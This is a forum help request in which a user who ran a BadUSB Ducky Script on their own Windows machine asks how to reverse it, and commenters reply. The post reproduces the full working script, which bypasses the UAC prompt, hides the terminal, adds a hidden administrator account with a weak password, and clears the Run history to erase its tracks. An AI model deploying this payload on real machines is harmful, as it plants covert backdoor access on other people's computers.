# I messed up really bad! I need to undo some ducky scripts

Tags: arduino, reverse, undo, duckyscript

So I thought it would be fun to turn my Arduino Pro Micro into a bad usb rubber ducky. Wrong, It is not so fun. Stupid me ran this code that created an administrative user and hid it from other accounts. I am in way over my head and also am a complete idiot. The script can be found here:https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Windows-10:-Add-admin-account

```
REM Start delay
DELAY 1000
DELAY 300
GUI r
DELAY 300

STRING powershell Start-Process cmd -Verb runAs
DELAY 300
ENTER

DELAY 2000
REM bypassing security dialog
ALT y
DELAY 500
REM obfuscationg terminal
STRING mode con:cols=18 lines=1
DELAY 300
ENTER
REM changing color
STRING color 78
DELAY 300
ENTER
REM adding user usename = ADMIN password is admin 
STRING net user /add ADMIN admin
DELAY 300
ENTER
REM Adding user in administrators group
STRING net localgroup administrators ADMIN /add
DELAY 300
ENTER
REM Hiding the user via editing registory
STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList"
DELAY 300
ENTER

STRING REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ADMIN /t REG_DWORD /d 0
DELAY 300
ENTER

REM removing the footprints.
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
DELAY 300
ENTER
REM Safe exiting
STRING exit
DELAY 300
ENTER
```

If anyone knows how to reverse this that would be real nice. Sorry for wasting anyones time.

Comment: Wrong forum @Alex R, but well you can also ask here, Did you try to refresh your computer?

Comment: I think i solved it. I already had an account named admin so it didnt create a new account. I also changed the certificate value to 1 to show all accounts